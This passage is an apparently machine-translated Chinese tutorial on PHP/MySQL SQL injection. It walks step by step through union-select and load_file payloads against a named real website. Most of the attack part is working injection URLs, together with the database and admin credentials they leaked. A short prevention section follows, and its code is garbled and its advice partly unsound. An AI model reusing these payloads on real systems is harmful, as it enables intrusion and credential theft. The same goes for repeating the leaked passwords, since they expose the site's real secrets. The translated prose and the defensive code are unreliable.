Char (100, 58, 47, 119, 101, 98, 47, 104, 101, 105, 98, 97, 105, 47, 100, 111, 119, 110, 47, 115, 104, 111, 119, 46, 112, 104, 112)

we

View-source:

http://www.heibai.net/down/show.php?id=5403 and 1=2 Union Select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, load_file (char (100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,104,111,119,46,112,104,112)), 13,14,15,16,17,18,19view-source: View source means, As for why, we will tell

Show its source code

Figure 40

Because there is a sentence in Show.php

If we submit them directly in the browser to jump to list.php

We found this request ("./include/config.inc.inc.php");

Good things, you should put this configuration file, OK continues

D: /web/heibai/down/include/config.inc.php

Converted to char (100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)

We entered

http://www.heibai.net/down/show.php?id=5403 and 1=2 Union Select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, load_file (char (100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)), 13,14,15,16,17,18, 19

The result is shown in Figure 41

Main content

......................

YMDown (Night Cat Download System) is a program that applies to the website to provide download services

// ----------------------------------- ---------- //

// Regular setting //

// ----------------------------------- ---------- //

// Database Information

$ dbhost = "localhost"; // Database host name

$ dbuser = "Download"; // Database User Name

$ dbpasswd = "kunstar988"; // database password

$ DBNAME = "Download"; // Database Name

// cookie name

$ cookie_name = "heibai";

// version number

$ Version = "1.0.1";

// Data Name

$ DOWN_TABLE = YMDOWN;

$ DOWN_USER_TABLE = YMDOWN_USER;

$ DOWN_SORT1_TABLE = YMDOWN_SORT1;

$ DOWN_SORT2_TABLE = YMDOWN_SORT2;

Dizzy, use the night cat's download system, and we know $ dbuser = "download"; // Database Username

$ dbpasswd = "kunstar988"; // database password

Maybe it will be useful.

The table name of use is the default table name, we know that the cursor password of the night cat is placed in YMDown_User

We continue

Http://www.heibai.net/down/show.php?id=5403 and 1=2 Union Select 1, 2, 3 ,username, 5 ,password ,7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19 from YMDown_User

The result is shown in Figure 42

According to the prompted we know that the file size is UserName, the application platform is Password (in connection with Figure 36)

Username = DLOAD, Password = 6558428, the backstage of the night cat default in the admin directory, I tried didn't find it for a long time, halo.

I want to directly connect MySQL and find that the Telnet port is not open. Let's take a look else!

http://www.heibai.net/vip/Article/login.php

It looks like a member's landing, let's take a look.

D: /web/heibai/vip/Article/login.php

Transform into Char (100, 58, 47, 119, 101, 98, 47, 104, 101, 118, 105, 112, 47, 97, 114, 116, 105, 99, 108, 101, 110, 108, 111, 103, 105, 110, 46, 112, 104, 112)

We entered

http://www.heibai.net/down/show.php?id=5403 and 1=2 Union Select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, load_file (char (100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,108,111,103,105,110,46,112,104,112)), 13,14,15,16,17,18,19

The result is shown in Figure 43:

among them

Require ("./include/global.php");

Require ("./include/config.inc.inc.php");

Require ("./mainfunction.php");

REQUIRE ("./function.php");

Of course, let's see config.inc.php.

D: /web/heibai/vip/Article/include/config.inc.php

Converted to char (100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)

enter

http://www.heibai.net/down/show.php?id=5403 and 1=2 Union Select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, load_file (char (100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)), 13,14,15, 16, 17, 18, 19 results are shown in Figure 44

Show a lot of good things.

$ dbhost = "localhost"; // Database host name

$ dbuser = "root"; // Database Username

$ dbpass = "234ytr8ut"; // Database password

$ dbname = "article"; // database name

$ yMCMS_USER_TABLE = "User";

$ yMCMS_USERGROUP_TABLE = "Usergroup";

$ YMCMS_USERRACE_TABLE = "Userrace";

The table is still the default table, and the root password is coming out.

If you can connect it to its mysql, then we can Into outfile.

Looking for PHPMYADMIN, I didn't find it, I may not use it at all.

Read c: /winnt/php.ini discovery

Magic quotes

;

Magic quotes for incoming Get / Post / Cookie Data.

Magic_quotes_GPC = ON

55555555, in pain, let's see if you can engage a few membership accounts.

Guess membership accounts in the User table, we directly read the user.myd file in the Article folder directly.

Article / user.myd converted into

CHAR (97, 114, 116, 105, 99, 108, 101, 47, 117, 115, 101, 114, 46, 109, 121, 100)

We entered

http://www.heibai.net/down/show.php?id=5403 and 1=2 Union Select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, LOAD_FILE (CHAR (97, 114, 116, 105, 99, 108, 101, 47, 117, 115, 101, 114, 46, 109, 121, 100)), 13, 14, 15, 16, 17, 18, 19

The result is shown in Figure 45:

Dizzy, there is no return. Let's read Article / User.frm

http://www.heibai.net/down/show.php?id=5403 and 1=2 Union Select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, LOAD_FILE (CHAR (97, 114, 116, 105, 99, 108, 101, 47, 117, 115, 101, 114, 46, 102, 114, 109)), 13, 14, 15, 16, 17, 18, 19

The result is shown in Figure 46

Dizziness, the table structure is also successful, but why do article / user.myd can't read it? If we can go outfile to see, but ...

Depressed, the test is ended, the following work is still left to you! The problem described in the article has notified Xingkun!

Four: Preventive methods of PHP MySQL injection.

In the previous topic, there have been a lot of prevention methods. Here I will primarily talk about the prevention method of PHP MySQL injection attack.

Everyone sees that many injection attacks have no effect when magic_quotes_gpc = ON.

We can use this to reinforce our procedure. The addslashes () function is equivalent to magic_quotes_gpc = ON, and it is not conflict with Magic_QUOTES_GPC = ON, we can filter it

$ usrname = addslashes ($ usrname);

$ query = "select * from username where userid = '$ usrname');

For ID types we can use the intVal () function, the intVal () function can convert the variable into an integer type so that it is possible.

We can

$ ID = INTVAL ($ ID);

$ query = "Select * from alphadb where articleid = '$ ID');

If it is a character type?

We can use addslashes () to filter it, then filter "%" and "_".

E.g:

$ search = addslashes ($ search);

$ search = str_replace ("_", "/ _", $ search);

$ search = STR_REPLACE ("%", "/%", $ search;

Remember, don't replace / // in the case of Magic_QUOTES_GPC = ON, as follows:

$ Password = STR_REPLACE ("//", ", $ password);

I remember to mention this issue in Darkness's article "once in a PHP site" (included in the CD).

There is also a place where you are logging in. If you use only one administrator to manage, we can use MD5 to use MD5 directly, so you don't have to be afraid of injection technology.

UserName = MD5 ($ http_post_vars ["username"]);

Passwd = md5 ($ http_post_vars ["passwd"]);

I am like this in my background.

postscript:

This article says so much, injected is a flexible technology, there are many technologies to continue to develop, any problems and opinions can go to the Yellow Corps (

Www.cnwill.com/www.securityfaq.org) to find me, but also welcome the content criticism of the text. In order to facilitate everyone to learn this article, the article system will also be supplied with the disc.

Postscript:

This article is still a year ago. Today, many new technologies have emerged, and the specific content is referred to the security angel.

Www.4ngel.net